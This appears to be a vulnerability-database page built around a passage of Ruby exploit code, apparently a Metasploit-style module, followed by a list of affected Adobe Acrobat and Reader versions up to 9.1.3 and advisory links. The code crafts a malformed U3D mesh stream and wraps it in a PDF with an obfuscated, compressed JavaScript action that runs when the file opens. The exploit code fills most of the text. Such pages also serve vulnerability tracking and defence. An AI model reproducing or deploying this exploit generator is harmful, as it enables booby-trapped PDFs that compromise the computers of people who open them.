minimum resolution decl_data << [0x65].pack('V') # final maximum resolution (needs to be bigger than the minimum) # quality factors decl_data << [0x12c].pack('V') # position quality factor decl_data << [0x12c].pack('V') # normal quality factor decl_data << [0x12c].pack('V') # texture coord quality factor # inverse quantiziation decl_data << [0].pack('V') # position inverse quant decl_data << [0].pack('V') # normal inverse quant decl_data << [0].pack('V') # texture coord inverse quant decl_data << [0].pack('V') # diffuse color inverse quant decl_data << [0].pack('V') # specular color inverse quant # resource params decl_data << [0].pack('V') # normal crease param decl_data << [0].pack('V') # normal update param decl_data << [0].pack('V') # normal tolerance param # skeleton description decl_data << [0].pack('V') # bone count # padding mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV') mesh_decl << decl_data mesh_decl << u3d_pad(decl_data) # build the modifier chain chain_data = [meshname.length].pack('v') chain_data << meshname chain_data << [1].pack('V') # type (model resource) chain_data << [0].pack('V') # attributes (no bounding info) chain_data << u3d_pad(chain_data) chain_data << [1].pack('V') # number of modifiers chain_data << mesh_decl modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV') modifier_chain << chain_data # mesh continuation cont_data = [meshname.length].pack('v') cont_data << meshname cont_data << [0].pack('V') # chain idx cont_data << [0].pack('V') # start resolution cont_data << [0x100].pack('V') # end resolution # 256 continuation blocks cont_data << [index].pack('V') # split position index # unknown data cont_data << [1].pack('V') * 10 cont_data << "Feli" * 20 mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV') mesh_cont << cont_data mesh_cont << u3d_pad(cont_data) data = hdr data << modifier_chain data << mesh_cont # patch the length data[24,4] = [0x174].pack('V') # hardcode the data length return data end def make_pdf(js, u3d_stream) xref = [] eol = "\x0a" obj_end = "" << eol << "endobj" << eol # the header pdf = "%PDF-1.7" << eol # filename/comment pdf << "%" << RandomNonASCIIString(4) << eol # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(1) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << obj_end # catalog xref << pdf.length pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) pdf << nObfu("/Pages ") << ioRef(5) pdf << nObfu("/OpenAction ") << ioRef(8) pdf << nObfu(">>") pdf << obj_end # outline xref << pdf.length pdf << ioDef(4) << nObfu("<</Type/Outlines/Count 0>>") pdf << obj_end # kids xref << pdf.length pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [") pdf << ioRef(9) << " " # empty page pdf << ioRef(10) # u3d page pdf << nObfu("]>>") pdf << obj_end # u3d stream xref << pdf.length pdf << ioDef(6) << nObfu("<</Type/3D/Subtype/U3D/Length %s>>" % u3d_stream.length) << eol pdf << "stream" << eol pdf << u3d_stream << eol pdf << "endstream" pdf << obj_end # u3d annotation object xref << pdf.length pdf << ioDef(7) << nObfu("<</Type/Annot/Subtype") pdf << "/3D/3DA <</A/PO/DIS/I>>" pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>") pdf << obj_end # js dict xref << pdf.length pdf << ioDef(8) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end # page 0 (empty) xref << pdf.length pdf << ioDef(9) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]") pdf << nObfu(" >>") pdf << obj_end # page 1 (u3d) xref << pdf.length pdf << ioDef(10) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]") pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]") pdf << nObfu(">>") pdf << obj_end # xrefs xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end # trailer pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(3) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end end

Products Mentioned

Configuraton 0

Adobe>>Acrobat >> Version To (including) 9.1.3

Adobe>>Acrobat >> Version 7.0

Adobe>>Acrobat >> Version 7.0.1

Adobe>>Acrobat >> Version 7.0.2

Adobe>>Acrobat >> Version 7.0.3

Adobe>>Acrobat >> Version 7.0.4

Adobe>>Acrobat >> Version 7.0.5

Adobe>>Acrobat >> Version 7.0.6

Adobe>>Acrobat >> Version 7.0.7

Adobe>>Acrobat >> Version 7.0.8

Adobe>>Acrobat >> Version 7.0.9

Adobe>>Acrobat >> Version 7.1.0

Adobe>>Acrobat >> Version 7.1.1

Adobe>>Acrobat >> Version 7.1.3

Adobe>>Acrobat >> Version 8.0

Adobe>>Acrobat >> Version 8.1

Adobe>>Acrobat >> Version 8.1.1

Adobe>>Acrobat >> Version 8.1.2

Adobe>>Acrobat >> Version 8.1.3

Adobe>>Acrobat >> Version 8.1.4

Adobe>>Acrobat >> Version 8.1.6

Adobe>>Acrobat >> Version 9.0

Adobe>>Acrobat >> Version 9.1.1

Adobe>>Acrobat >> Version 9.1.2

Configuraton 0

Adobe>>Acrobat_reader >> Version To (including) 9.1.3

Adobe>>Acrobat_reader >> Version 7.0

Adobe>>Acrobat_reader >> Version 7.0.1

Adobe>>Acrobat_reader >> Version 7.0.2

Adobe>>Acrobat_reader >> Version 7.0.3

Adobe>>Acrobat_reader >> Version 7.0.4

Adobe>>Acrobat_reader >> Version 7.0.5

Adobe>>Acrobat_reader >> Version 7.0.6

Adobe>>Acrobat_reader >> Version 7.0.7

Adobe>>Acrobat_reader >> Version 7.0.8

Adobe>>Acrobat_reader >> Version 7.0.9

Adobe>>Acrobat_reader >> Version 7.1.0

Adobe>>Acrobat_reader >> Version 7.1.1

Adobe>>Acrobat_reader >> Version 7.1.3

    Adobe>>Acrobat_reader >> Version 8.0

    Adobe>>Acrobat_reader >> Version 8.1

    Adobe>>Acrobat_reader >> Version 8.1.1

    Adobe>>Acrobat_reader >> Version 8.1.2

    Adobe>>Acrobat_reader >> Version 8.1.3

    Adobe>>Acrobat_reader >> Version 8.1.4

    Adobe>>Acrobat_reader >> Version 8.1.5

    Adobe>>Acrobat_reader >> Version 8.1.6

    Adobe>>Acrobat_reader >> Version 9.0

    Adobe>>Acrobat_reader >> Version 9.1

    Adobe>>Acrobat_reader >> Version 9.1.1

    Adobe>>Acrobat_reader >> Version 9.1.2

    References

    http://www.securityfocus.com/bid/36638
    Tags : vdb-entry, x_refsource_BID
    http://www.us-cert.gov/cas/techalerts/TA09-286B.html
    Tags : third-party-advisory, x_refsource_CERT
    http://securitytracker.com/id?1023007
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.vupen.com/english/advisories/2009/2898
    Tags : vdb-entry, x_refsource_VUPEN